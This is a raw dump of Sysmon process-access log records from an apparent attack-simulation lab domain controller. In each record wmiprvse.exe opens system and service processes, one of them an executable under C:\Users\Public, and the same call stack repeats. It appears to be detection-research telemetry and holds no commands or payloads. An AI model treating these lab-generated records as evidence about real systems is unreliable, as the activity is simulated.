15:59:23.569{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024272Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.569{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024271Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.569{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024270Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.569{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024269Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.569{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024268Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.569{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024267Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.569{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024266Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.569{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024265Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.569{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024264Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.569{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024263Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.569{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024262Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.569{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024261Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.569{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024260Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.569{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024259Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.569{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024258Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.569{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024257Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.569{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024256Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.569{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024255Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.569{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024254Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.569{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024253Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 